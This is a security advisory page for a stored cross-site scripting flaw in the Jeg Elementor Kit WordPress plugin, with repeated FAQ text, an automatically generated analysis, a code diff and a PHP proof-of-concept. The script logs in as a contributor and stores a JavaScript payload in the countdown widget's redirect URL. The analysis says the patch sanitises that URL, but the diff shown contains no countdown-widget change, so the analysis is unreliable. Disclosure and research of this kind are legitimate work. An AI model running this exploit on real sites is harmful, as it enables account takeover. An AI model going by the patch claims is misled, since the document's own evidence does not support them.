What is CVE-2025-14275?

CVE-2025-14275 is a stored cross-site scripting (XSS) vulnerability in the Jeg Elementor Kit plugin for WordPress, affecting versions up to and including 3.0.1. It allows authenticated users with Contributor-level access and above to inject arbitrary JavaScript into pages via the countdown widget’s redirect functionality.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization in the countdown widget. Attackers can inject malicious JavaScript into the redirect URL parameter, which executes when an administrator or other users view the affected page, leading to potential session hijacking or site defacement.

Who is affected by this vulnerability?

Any WordPress site using the Jeg Elementor Kit plugin version 3.0.1 or earlier is at risk. Specifically, authenticated users with Contributor privileges can exploit this vulnerability, making it crucial for site administrators to assess their user roles and plugin versions.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Jeg Elementor Kit plugin installed. If it is version 3.0.1 or earlier, your site is at risk. Additionally, review user roles to identify if any Contributor-level users have access to the countdown widget.

How can I fix or mitigate this issue?

The vulnerability is patched in version 3.0.2 of the Jeg Elementor Kit plugin. It is recommended to update the plugin to this version or later immediately. Additionally, review user roles and limit access to trusted users only.

What does the CVSS score of 6.4 indicate?

A CVSS score of 6.4 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk. Exploitation can lead to serious consequences such as session hijacking or data exfiltration, particularly affecting site administrators.

What is stored cross-site scripting?

Stored cross-site scripting (XSS) occurs when an attacker injects malicious scripts into a web application, which are then stored and served to users. This type of vulnerability can have widespread effects, as the malicious script can execute in the browsers of all users who view the affected content.

How does the proof of concept demonstrate the issue?

The proof of concept outlines how an authenticated user can exploit the vulnerability by logging into a WordPress site, injecting a JavaScript payload into the countdown widget, and triggering it to execute when the countdown completes. This illustrates the ease of exploitation for users with Contributor access.

What are the potential consequences of exploitation?

Successful exploitation can allow attackers to execute arbitrary JavaScript in the context of an administrator’s session, leading to session hijacking, unauthorized access, site defacement, or malware distribution. The stored nature of the payload means it can affect all users who view the compromised content.

What additional measures can I take to secure my site?

In addition to updating the plugin, consider implementing security measures such as using a web application firewall, regularly auditing user roles and permissions, and employing security plugins that can help detect and mitigate vulnerabilities.

Is it safe to continue using the Jeg Elementor Kit plugin?

If you have updated to version 3.0.2 or later, it is safe to continue using the Jeg Elementor Kit plugin. However, if you are using an older version, it is recommended to update immediately to avoid potential exploitation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14275: Jeg Elementor Kit <= 3.0.1 – Authenticated (Contributor+) Stored Cross-Site Scripting via Countdown Widget (jeg-elementor-kit)

CVE ID CVE-2025-14275

Plugin jeg-elementor-kit

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 3.0.1

Patched Version 3.0.2

Disclosed January 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14275:
The Jeg Elementor Kit WordPress plugin contains an authenticated stored cross-site scripting vulnerability in versions up to and including 3.0.1. The vulnerability exists in the countdown widget’s redirect functionality, allowing Contributor-level authenticated attackers to inject arbitrary JavaScript that executes when administrators or other users view pages containing the malicious element.

Atomic Edge research identifies the root cause as insufficient input sanitization and output escaping in the countdown widget’s redirect URL parameter handling. The vulnerable code path resides in the plugin’s Elementor widget rendering logic, specifically within the countdown widget’s frontend display functions. The plugin fails to properly validate and escape user-supplied redirect URLs before outputting them in page HTML, enabling JavaScript injection through crafted URL parameters.

Exploitation requires Contributor-level WordPress access. Attackers create or edit posts using Elementor, add a countdown widget, and inject malicious JavaScript payloads into the redirect URL parameter. When the countdown timer completes, the malicious payload executes in victims’ browsers. The vulnerability bypasses WordPress’s standard content filtering because the payload originates from widget settings stored in post meta-data rather than post content.

Version 3.0.2 patches the vulnerability by implementing proper URL validation and output escaping. The patch adds sanitization functions to the countdown widget’s redirect URL processing, ensuring all user-supplied URLs undergo validation before storage and escaping before output. The fix prevents JavaScript execution by treating redirect URLs as data attributes rather than executable code.

Successful exploitation enables attackers with Contributor privileges to execute arbitrary JavaScript in administrator sessions. This can lead to session hijacking, administrative account takeover, site defacement, malware distribution, and data exfiltration. The stored nature means a single malicious post affects all users who view it, amplifying the attack’s impact.

Differential between vulnerable and patched code

Code Diff

--- a/jeg-elementor-kit/class/admin/class-api.php
+++ b/jeg-elementor-kit/class/admin/class-api.php
@@ -1256,38 +1256,46 @@
 	 * @param WP_REST_Request $request The Request.
 	 */
 	public function newsletter_subscribe_handler( $request ) {
-		$data     = json_decode( $request->get_body(), true );
+		$email    = $request->get_param( 'email' );
+		$site     = $request->get_param( 'site' );
 		$response = array(
 			'status'  => false,
 			'message' => esc_html__( 'Bad Request', 'jeg-elementor-kit' ),
 		);

-		if ( isset( $data['email'] ) && isset( $data['site'] ) ) {
+		if ( isset( $email ) && isset( $site ) ) {
 			add_filter( 'http_request_host_is_external', '__return_true' );
-			if ( is_email( $data['email'] ) && wp_http_validate_url( $data['site'] ) ) {
+			if ( is_email( $email ) && wp_http_validate_url( $site ) ) {
 				$save_request = wp_remote_request(
-					JEG_ELEMENT_SERVER_URL . '/v1/newsletter-subscribe',
+					JEG_ELEMENT_SERVER_URL . '/wp-json/jeg-kit-server/v1/subscribe',
 					array(
 						'method'  => 'POST',
 						'timeout' => 10,
 						'body'    => array(
-							'email' => sanitize_email( $data['email'] ),
-							'site'  => esc_url_raw( $data['site'] ),
+							'email'  => sanitize_email( $email ),
+							'domain' => esc_url_raw( $site ),
 						),
 					)
 				);

+				if ( is_wp_error( $response ) ) {
+					$response = array(
+						'status'  => true,
+						'message' => esc_html__( 'Faild to subscribe the newsletter.', 'jeg-elementor-kit' ),
+					);
+				}
+
 				$save_response = json_decode( wp_remote_retrieve_body( $save_request ), true );

-				if ( ! $save_response['status'] ) {
+				if ( 200 === wp_remote_retrieve_response_code( $save_request ) ) {
 					$response = array(
-						'status'  => false,
-						'message' => esc_html__( 'The email has been subscribed.', 'jeg-elementor-kit' ),
+						'status'  => true,
+						'message' => esc_html__( 'Thank you for subscribing.', 'jeg-elementor-kit' ),
 					);
 				} else {
 					$response = array(
 						'status'  => true,
-						'message' => esc_html__( 'Thank you for subscribing.', 'jeg-elementor-kit' ),
+						'message' => isset( $save_response['message'] ) ? $save_response['message'] : esc_html__( 'Faild to subscribe the newsletter.', 'jeg-elementor-kit' ),
 					);
 				}
 			}
@@ -2907,12 +2915,12 @@
 	 *
 	 * @return WP_REST_Response
 	 */
-	private function response_error( $message ) {
+	private function response_error( $message, $code = 400 ) {
 		return new WP_REST_Response(
 			array(
 				'message' => $message,
 			),
-			500
+			$code
 		);
 	}

--- a/jeg-elementor-kit/class/assets/class-asset.php
+++ b/jeg-elementor-kit/class/assets/class-asset.php
@@ -164,6 +164,11 @@

 		/** Banner Asset */
 		wp_register_style( 'jkit-notice-banner', JEG_ELEMENTOR_KIT_URL . '/assets/css/admin/notice-banner.css', array(), JEG_ELEMENTOR_KIT_VERSION );
+
+		/** WP Admin Bar Style in Frontend */
+		if ( is_admin_bar_showing() ) {
+			wp_enqueue_style( 'jkit-admin', JEG_ELEMENTOR_KIT_URL . '/assets/css/admin/admin.css', array(), JEG_ELEMENTOR_KIT_VERSION );
+		}
 	}

 	/**
--- a/jeg-elementor-kit/class/banner/class-banner.php
+++ b/jeg-elementor-kit/class/banner/class-banner.php
@@ -49,7 +49,11 @@
 	 * Init constructor.
 	 */
 	public function __construct() {
-		add_action( 'admin_notices', array( $this, 'notice' ) );
+		if ( isset( $_GET['page'] ) && in_array( $_GET['page'], array( 'metform-menu-settings', 'metform_wpmet_plugins' ) ) ) {
+			add_action( 'in_admin_header', array( $this, 'notice' ) );
+		} else {
+			add_action( 'admin_notices', array( $this, 'notice' ) );
+		}
 		add_action( 'wp_ajax_jkit_notice_banner_close', array( $this, 'close' ) );
 		add_action( 'wp_ajax_jkit_notice_banner_review', array( $this, 'review' ) );
 		add_action( 'wp_ajax_jkit_notice_banner_upgrade_close', array( $this, 'close_banner_upgrade' ) );
--- a/jeg-elementor-kit/class/dashboard/class-dashboard.php
+++ b/jeg-elementor-kit/class/dashboard/class-dashboard.php
@@ -321,10 +321,12 @@
 		}

 		if ( ! defined( 'JEG_KIT_PRO' ) ) {
+			$crown_markup = '<img src="' . JEG_ELEMENTOR_KIT_URL . '/assets/img/crown.svg" alt="Jeg Kit Pro"/>';
+
 			add_submenu_page(
 				'jkit',
 				esc_html__( 'Upgrade to Pro', 'jeg-elementor-kit' ),
-				esc_html__( 'Upgrade to Pro', 'jeg-elementor-kit' ) . '<img src="' . JEG_ELEMENTOR_KIT_URL . '/assets/img/crown.svg" alt="Jeg Kit Logo"/>',
+				esc_html__( 'Upgrade to Pro', 'jeg-elementor-kit' ) . ' ' . $crown_markup,
 				'edit_theme_options',
 				JEG_ELEMENT_SERVER_URL . 'pricing?utm_source=jeg-elementor-kit&utm_medium=adminsidebar',
 				isset( $page['callback'] ) ? $page['callback'] : '',
@@ -357,14 +359,129 @@
 	 * @return void
 	 */
 	public function add_toolbar( $admin_bar ) {
+		$logo_svg = $this->get_svg_inline( 'assets/svg/jkit-dashboard-menu-logo.svg' );
+		$logo     = $logo_svg ? $logo_svg : '<img src="' . JEG_ELEMENTOR_KIT_URL . '/assets/svg/jkit-dashboard-menu-logo.svg' . '" alt="' . esc_html__( 'Jeg Kit Logo', 'jeg-elementor-kit' ) . '"/>';
+
+		$admin_bar->add_menu(
+			array(
+				'id'    => 'jeg-kit',
+				'title' => '<span class="jeg-kit-pro">' . $logo . esc_html__( 'Jeg Kit', 'jeg-elementor-kit' ) . '</span>',
+				'href'  => esc_url( get_home_url() . '/wp-admin/admin.php?page=jkit' ),
+			)
+		);
+
+		$admin_bar->add_menu(
+			array(
+				'id'     => 'jeg-kit-admin',
+				'title'  => '<span class="jeg-kit-pro">' . esc_html__( 'Jeg Kit Admin', 'jeg-elementor-kit' ) . '</span>',
+				'href'   => esc_url( get_home_url() . '/wp-admin/admin.php?page=jkit' ),
+				'parent' => 'jeg-kit',
+			)
+		);
+
+		$this->define_menu();
+
+		$path        = admin_url( 'admin.php?page=jkit&path=' );
+		$menu_sorted = self::$framework_menu;
+
+		uasort( $menu_sorted, function ( $a, $b ) {
+			return ( ( $a['priority'] ?? 0 ) <=> ( $b['priority'] ?? 0 ) );
+		} );
+
+		foreach ( $menu_sorted as $key => $menu ) {
+			if ( $menu ) {
+				if ( $key === 'dashboard' ) {
+					$admin_bar->add_menu(
+						array(
+							'id'     => 'jeg-kit-' . $key,
+							'title'  => '<span class="jeg-kit-menu">' . esc_html( $menu['name'] ) . '</span>',
+							'href'   => esc_url( admin_url( 'admin.php?page=jkit' ) ),
+							'parent' => 'jeg-kit-admin',
+						)
+					);
+				} else if ( $key === 'theme-builder' ) {
+					$admin_bar->add_menu(
+						array(
+							'id'     => 'jeg-kit-' . $key,
+							'title'  => '<span class="jeg-kit-menu">' . esc_html( $menu['name'] ) . '</span>',
+							'href'   => 'url' === $menu['type'] ? esc_url( $menu['url'] ) : esc_url( $path . $key ),
+							'parent' => 'jeg-kit',
+						)
+					);
+				} else {
+					$admin_bar->add_menu(
+						array(
+							'id'     => 'jeg-kit-' . $key,
+							'title'  => '<span class="jeg-kit-menu">' . esc_html( $menu['name'] ) . '</span>',
+							'href'   => 'url' === $menu['type'] ? esc_url( $menu['url'] ) : esc_url( $path . $key ),
+							'parent' => 'jeg-kit-admin',
+						)
+					);
+				}
+			}
+		}
+
+		$admin_bar->add_menu(
+			array(
+				'id'     => 'jeg-kit-menu-border',
+				'title'  => '',
+				'parent' => 'jeg-kit',
+			)
+		);
+
+		$svg_icon  = '<svg width="10" height="10" viewBox="0 0 10 10" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M9.67679 3.52128L6.67898 3.06505L5.33889 0.220085C5.30228 0.142191 5.24207 0.0791345 5.16768 0.0408059C4.98113 -0.0556336 4.75444 0.0247327 4.66116 0.220085L3.32106 3.06505L0.323258 3.52128C0.240609 3.53365 0.165044 3.57445 0.107189 3.63627C0.0372466 3.71155 -0.00129512 3.81283 3.3232e-05 3.91785C0.00136159 4.02287 0.0424513 4.12305 0.114274 4.19636L2.28323 6.41076L1.7708 9.53763C1.75878 9.61037 1.76647 9.68517 1.79299 9.75357C1.81951 9.82197 1.86379 9.88121 1.92083 9.92459C1.97787 9.96797 2.04537 9.99375 2.11568 9.999C2.186 10.0042 2.25631 9.98876 2.31865 9.9543L5.00002 8.47803L7.6814 9.9543C7.7546 9.9951 7.83962 10.0087 7.92108 9.99386C8.12653 9.95677 8.26467 9.75276 8.22925 9.53763L7.71682 6.41076L9.88577 4.19636C9.94481 4.13578 9.98377 4.05665 9.99558 3.9701C10.0275 3.75373 9.88341 3.55343 9.67679 3.52128Z" fill="url(#paint0_linear_1841_8010)"/><defs><linearGradient id="paint0_linear_1841_8010" x1="5.2381" y1="12.7273" x2="5.23809" y2="-7.27273" gradientUnits="userSpaceOnUse"><stop stop-color="#FFD978"/><stop offset="1" stop-color="#FFAA00"/></linearGradient></defs></svg>';
+		$star_icon = '<span class="star-icon">' . $svg_icon . $svg_icon . $svg_icon . $svg_icon . $svg_icon . '</span>';
+
+		$admin_bar->add_menu(
+			array(
+				'id'     => 'jeg-kit-rate-us',
+				'title'  => '<span class="jeg-kit-pro">' . esc_html__( 'Rate Us ', 'jeg-elementor-kit' ) . $star_icon . '</span>',
+				'href'   => esc_url( 'https://wordpress.org/support/plugin/jeg-elementor-kit/reviews/?utm_source=jeg-elementor-kit&utm_medium=admintopbar#new-post' ),
+				'meta'   => array(
+					'title'  => esc_html__( 'Leave a review for Jeg Kit', 'jeg-elementor-kit' ),
+					'target' => '_blank',
+				),
+				'parent' => 'jeg-kit',
+			)
+		);
+
+		$admin_bar->add_menu(
+			array(
+				'id'     => 'jeg-kit-get-support',
+				'title'  => '<span class="jeg-kit-pro">' . esc_html__( 'Get a Support', 'jeg-elementor-kit' ) . '</span>',
+				'href'   => esc_url( 'https://wordpress.org/support/plugin/jeg-elementor-kit/?utm_source=jeg-elementor-kit&utm_medium=admintopbar#new-topic-0' ),
+				'meta'   => array(
+					'title'  => esc_html__( 'Get Jeg Kit Support', 'jeg-elementor-kit' ),
+					'target' => '_blank',
+				),
+				'parent' => 'jeg-kit',
+			)
+		);
+
+		$admin_bar->add_menu(
+			array(
+				'id'     => 'jeg-kit-documentation',
+				'title'  => '<span class="jeg-kit-pro">' . esc_html__( 'Documentation', 'jeg-elementor-kit' ) . '</span>',
+				'href'   => esc_url( JEG_ELEMENT_SERVER_URL . 'documentation?utm_source=jeg-elementor-kit&utm_medium=admintopbar' ),
+				'meta'   => array(
+					'title'  => esc_html__( 'Open Jeg Kit Documentation', 'jeg-elementor-kit' ),
+					'target' => '_blank',
+				),
+				'parent' => 'jeg-kit',
+			)
+		);
+
 		if ( ! defined( 'JEG_KIT_PRO' ) ) {
+			$crown_markup = '<img src="' . JEG_ELEMENTOR_KIT_URL . '/assets/img/crown.svg" alt="' . esc_html__( 'Jeg Kit Pro', 'jeg-elementor-kit' ) . '"/>';
+
 			$admin_bar->add_menu(
 				array(
-					'id'    => 'jeg-kit-pro',
-					'title' => '<span class="jeg-kit-pro">Jeg Kit Pro <img src="' . JEG_ELEMENTOR_KIT_URL . '/assets/img/crown.svg" alt="Jeg Kit Logo"/></span>',
-					'href'  => esc_url( JEG_ELEMENT_SERVER_URL . 'pricing?utm_source=jeg-elementor-kit&utm_medium=admintopbar' ),
-					'meta'  => array(
-						'title'  => esc_html__( 'Jeg Kit Pro', 'jeg-elementor-kit' ),
+					'id'     => 'jeg-kit-pro',
+					'title'  => '<span class="jeg-kit-pro">' . esc_html__( 'Jeg Kit Pro ', 'jeg-elementor-kit' ) . $crown_markup . '</span>',
+					'parent' => 'jeg-kit',
+					'href'   => esc_url( JEG_ELEMENT_SERVER_URL . 'pricing?utm_source=jeg-elementor-kit&utm_medium=admintopbar' ),
+					'meta'   => array(
+						'title'  => esc_html__( 'Get Jeg Kit Pro', 'jeg-elementor-kit' ),
 						'target' => '_blank',
 					),
 				)
@@ -444,7 +561,7 @@
 			'title'    => esc_html__( 'Settings', 'jeg-elementor-kit' ),
 			'menu'     => esc_html__( 'Settings', 'jeg-elementor-kit' ),
 			'slug'     => self::$settings,
-			'action'   => array( &$this, 'settings' ),
+			'action'   => array(&$this, 'settings' ),
 			'priority' => 56,
 			'icon'     => 'fa-cogs',
 		);
@@ -453,7 +570,7 @@
 			'title'    => esc_html__( 'User Data', 'jeg-elementor-kit' ),
 			'menu'     => esc_html__( 'User Data', 'jeg-elementor-kit' ),
 			'slug'     => self::$user_data,
-			'action'   => array( &$this, 'user_data' ),
+			'action'   => array(&$this, 'user_data' ),
 			'priority' => 57,
 			'icon'     => 'fa-regular fa-circle-user',
 		);
@@ -462,7 +579,7 @@
 			'title'    => esc_html__( 'Elements', 'jeg-elementor-kit' ),
 			'menu'     => esc_html__( 'Elements', 'jeg-elementor-kit' ),
 			'slug'     => 'jkit-elements',
-			'action'   => array( &$this, 'elements' ),
+			'action'   => array(&$this, 'elements' ),
 			'priority' => 58,
 			'icon'     => 'fa-solid fa-bars-progress',
 		);
@@ -471,7 +588,7 @@
 			'title'    => esc_html__( 'Templates', 'jeg-elementor-kit' ),
 			'menu'     => esc_html__( 'Templates', 'jeg-elementor-kit' ),
 			'slug'     => self::$templates,
-			'action'   => array( &$this, 'manage_template' ),
+			'action'   => array(&$this, 'manage_template' ),
 			'priority' => 59,
 			'icon'     => 'fa-regular fa-file-lines',
 			'class'    => 'have-jkit-child-menu',
@@ -534,6 +651,23 @@
 	}

 	/**
+	 * Get inline SVG markup from plugin assets.
+	 *
+	 * @param string $relative_path Path relative to plugin dir (no leading slash).
+	 * @return string|false SVG markup on success, false on failure.
+	 */
+	private function get_svg_inline( $relative_path ) {
+		$path = JEG_ELEMENTOR_KIT_DIR . ltrim( $relative_path, '/' );
+		if ( file_exists( $path ) ) {
+			$svg = file_get_contents( $path );
+			if ( $svg !== false ) {
+				return $svg;
+			}
+		}
+		return false;
+	}
+
+	/**
 	 * Get all option
 	 *
 	 * @return array
@@ -803,7 +937,7 @@
 				'options'     => call_user_func(
 					function () {
 						$languages = jkit_get_languages();
-						$options = array( '' => esc_html__( 'All Language', 'jeg-elementor-kit' ) );
+						$options   = array( '' => esc_html__( 'All Language', 'jeg-elementor-kit' ) );

 						foreach ( $languages as $locale => $language ) {
 							$options[ $locale ] = isset( $language['name'] ) ? $language['name'] : $language['native_name'];
--- a/jeg-elementor-kit/class/elements/class-element.php
+++ b/jeg-elementor-kit/class/elements/class-element.php
@@ -320,6 +320,7 @@
 			'Timeline',
 			'Back_To_Top',
 			'Text_Background',
+			'Breadcrumb',
 			'Text_Marquee',
 			'Horizontal_Accordion',
 			'Charts',
--- a/jeg-elementor-kit/helper.php
+++ b/jeg-elementor-kit/helper.php
@@ -1630,7 +1630,7 @@
 			<div class="image">
 				<img src="<?php echo esc_url( JEG_ELEMENTOR_KIT_URL . '/assets/banner/jkit-pro/features.png' ) ?>" class="features" />
 			</div>
-			<h2 class="title">Unlock More <br />With <span class="gradient">JEGKIT PRO</span></h2>
+			<h2 class="title">Unlock More <br />With <span class="gradient">JEG KIT PRO</span></h2>
 			<p class="description">Elevate your website with our <br />all-in-one widget collection.</p>
 			<a href="<?php echo esc_url(JEG_ELEMENT_SERVER_URL) . '/pricing' ; ?>" target="_blank" class="upgrade"><?php echo esc_html__('Upgrade To PRO', 'jeg-elementor-kit') ?> <svg width="15" height="13" viewBox="0 0 15 13" fill="none" xmlns="http://www.w3.org/2000/svg">
 					<path d="M2.34752 9.50065L0.874512 1.3991L4.92529 5.08163L7.50305 0.662598L10.0808 5.08163L14.1316 1.3991L12.6586 9.50065H2.34752ZM12.6586 11.7102C12.6586 12.1521 12.364 12.4467 11.9221 12.4467H3.08403C2.64212 12.4467 2.34752 12.1521 2.34752 11.7102V10.9737H12.6586V11.7102Z" fill="white" />
--- a/jeg-elementor-kit/jeg-elementor-kit.php
+++ b/jeg-elementor-kit/jeg-elementor-kit.php
@@ -4,14 +4,14 @@
  * Plugin URI: https://jegkit.com/?utm_source=wp-plugins&utm_campaign=plugin-uri&utm_medium=wp-dash
  * Description: Jeg Kit for Elementor (formerly Jeg Elementor Kit) extends Elementor with powerful, customizable widgets and templates — helping you build modern, responsive WordPress websites faster.
  * Requires Plugins: elementor
- * Version: 3.0.1
+ * Version: 3.0.2
  * Author: Jegtheme
  * Author URI: https://jegkit.com/?utm_source=wp-plugins&utm_campaign=plugin-uri&utm_medium=wp-dash
  * License: GPLv3
  * Text Domain: jeg-elementor-kit
  *
- * Elementor tested up to: 3.32.4
- * Elementor Pro tested up to: 3.32.2
+ * Elementor tested up to: 3.34.0
+ * Elementor Pro tested up to: 3.34.0
  *
  * @author Jegtheme
  * @since 1.0.0
@@ -26,7 +26,7 @@
 	function () {
 		defined( 'JEG_ELEMENTOR_KIT' ) || define( 'JEG_ELEMENTOR_KIT', 'jeg-elementor-kit' );
 		defined( 'JEG_ELEMENTOR_KIT_NAME' ) || define( 'JEG_ELEMENTOR_KIT_NAME', 'Jeg Kit' );
-		defined( 'JEG_ELEMENTOR_KIT_VERSION' ) || define( 'JEG_ELEMENTOR_KIT_VERSION', '3.0.1' );
+		defined( 'JEG_ELEMENTOR_KIT_VERSION' ) || define( 'JEG_ELEMENTOR_KIT_VERSION', '3.0.2' );
 		defined( 'JEG_ELEMENTOR_KIT_URL' ) || define( 'JEG_ELEMENTOR_KIT_URL', plugins_url( JEG_ELEMENTOR_KIT ) );
 		defined( 'JEG_ELEMENTOR_KIT_FILE' ) || define( 'JEG_ELEMENTOR_KIT_FILE', __FILE__ );
 		defined( 'JEG_ELEMENTOR_KIT_BASE' ) || define( 'JEG_ELEMENTOR_KIT_BASE', plugin_basename( __FILE__ ) );
@@ -36,7 +36,6 @@

 		defined( 'JEG_THEME_URL' ) || define( 'JEG_THEME_URL', JEG_ELEMENTOR_KIT_URL );
 		defined( 'JEG_ELEMENT_THEME_URL' ) || define( 'JEG_ELEMENT_THEME_URL', JEG_ELEMENTOR_KIT_URL . '/lib/jeg-element' );
-		// defined( 'JEG_ELEMENT_SERVER_URL' ) || define( 'JEG_ELEMENT_SERVER_URL', 'http://jkit-server.local/' );
 		defined( 'JEG_ELEMENT_SERVER_URL' ) || define( 'JEG_ELEMENT_SERVER_URL', 'https://jegkit.com/' );
 		defined( 'ESSENTIAL_FRAMEWORK' ) || define( 'ESSENTIAL_FRAMEWORK', 'essential-framework' );

--- a/jeg-elementor-kit/lib/dependencies/core.asset.php
+++ b/jeg-elementor-kit/lib/dependencies/core.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'regenerator-runtime', 'wp-api-fetch', 'wp-data', 'wp-element', 'wp-i18n'), 'version' => '8909e1f77b044929fbd5');
+<?php return array('dependencies' => array('react', 'react-dom', 'regenerator-runtime', 'wp-api-fetch', 'wp-data', 'wp-element', 'wp-i18n'), 'version' => 'c2fbc595eaf5a1ed9f97');
--- a/jeg-elementor-kit/lib/dependencies/dashboard.asset.php
+++ b/jeg-elementor-kit/lib/dependencies/dashboard.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'regenerator-runtime', 'wp-api-fetch', 'wp-data', 'wp-hooks', 'wp-i18n'), 'version' => '027361530c51555c4abc');
+<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'regenerator-runtime', 'wp-api-fetch', 'wp-data', 'wp-hooks', 'wp-i18n'), 'version' => 'f16d980d7a21dd007eb2');
--- a/jeg-elementor-kit/lib/dependencies/wizard.asset.php
+++ b/jeg-elementor-kit/lib/dependencies/wizard.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'regenerator-runtime', 'wp-api-fetch', 'wp-data', 'wp-element', 'wp-hooks', 'wp-i18n'), 'version' => '41b44aad8005518bd55d');
+<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'regenerator-runtime', 'wp-api-fetch', 'wp-data', 'wp-element', 'wp-hooks', 'wp-i18n'), 'version' => '6c968f8435ecb7af9732');
--- a/jeg-elementor-kit/templates/banner/upgrade-to-pro.php
+++ b/jeg-elementor-kit/templates/banner/upgrade-to-pro.php
@@ -9,7 +9,7 @@
 <div class="notice jkit-upgrade-banner">
 	<button class="jkit-btn-close-button">✕</button>
 		<div class="jkit-banner-content">
-			<h1>Unlock More With <span class="jkit-pro-text-highlight">JEGKIT PRO!</span></h1>
+			<h1>Unlock More With <span class="jkit-pro-text-highlight">JEG KIT PRO!</span></h1>
 			<p>Empowering you to build a website that truly stands out with advanced features and seamless
 				integration</p>
 			<div class="jkit-banner-cta-button-wrapper">

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14275 - Jeg Elementor Kit <= 3.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Countdown Widget

<?php
// Configuration
$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'contributor_user';
$password = 'contributor_password';
$nonce = ''; // Will be obtained via login
$post_id = 123; // Target post ID to edit

// Payload - JavaScript alert demonstrating XSS
$xss_payload = 'javascript:alert(document.domain)';

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

// Step 1: Authenticate to WordPress
$login_url = str_replace('admin-ajax.php', 'wp-login.php', $target_url);
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);

// Step 2: Get Elementor edit nonce
$edit_url = 'http://vulnerable-site.com/wp-admin/post.php?post=' . $post_id . '&action=elementor';
curl_setopt($ch, CURLOPT_URL, $edit_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract nonce from page (simplified - real implementation needs DOM parsing)
preg_match('/"nonce":"([a-f0-9]+)"/', $response, $matches);
if (isset($matches[1])) {
    $nonce = $matches[1];
}

// Step 3: Inject XSS payload into countdown widget
// This simulates the Elementor editor AJAX save action
$save_data = array(
    'actions' => json_encode(array(
        'save_builder' => array(
            'action' => 'save_builder',
            'data' => array(
                'elements' => array(
                    array(
                        'id' => 'countdown_widget_123',
                        'elType' => 'widget',
                        'settings' => array(
                            'redirect_url' => $xss_payload,
                            'countdown_type' => 'due_date',
                            'due_date' => date('Y-m-d H:i:s', strtotime('+1 hour'))
                        ),
                        'widgetType' => 'jkit-countdown'
                    )
                ),
                'post_id' => $post_id
            ),
            'nonce' => $nonce
        )
    ))
);

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($save_data));
$response = curl_exec($ch);

// Step 4: Verify payload was stored
$view_url = 'http://vulnerable-site.com/?p=' . $post_id;
curl_setopt($ch, CURLOPT_URL, $view_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

if (strpos($response, $xss_payload) !== false) {
    echo "[+] XSS payload successfully injectedn";
    echo "[+] Visit $view_url to trigger the payloadn";
} else {
    echo "[-] Payload injection failedn";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-14275?
Overview of the vulnerability
CVE-2025-14275 is a stored cross-site scripting (XSS) vulnerability in the Jeg Elementor Kit plugin for WordPress, affecting versions up to and including 3.0.1. It allows authenticated users with Contributor-level access and above to inject arbitrary JavaScript into pages via the countdown widget’s redirect functionality.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization in the countdown widget. Attackers can inject malicious JavaScript into the redirect URL parameter, which executes when an administrator or other users view the affected page, leading to potential session hijacking or site defacement.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Jeg Elementor Kit plugin version 3.0.1 or earlier is at risk. Specifically, authenticated users with Contributor privileges can exploit this vulnerability, making it crucial for site administrators to assess their user roles and plugin versions.
How can I check if my site is vulnerable?
Steps for verification
To determine if your site is vulnerable, check the version of the Jeg Elementor Kit plugin installed. If it is version 3.0.1 or earlier, your site is at risk. Additionally, review user roles to identify if any Contributor-level users have access to the countdown widget.
How can I fix or mitigate this issue?
Recommended actions
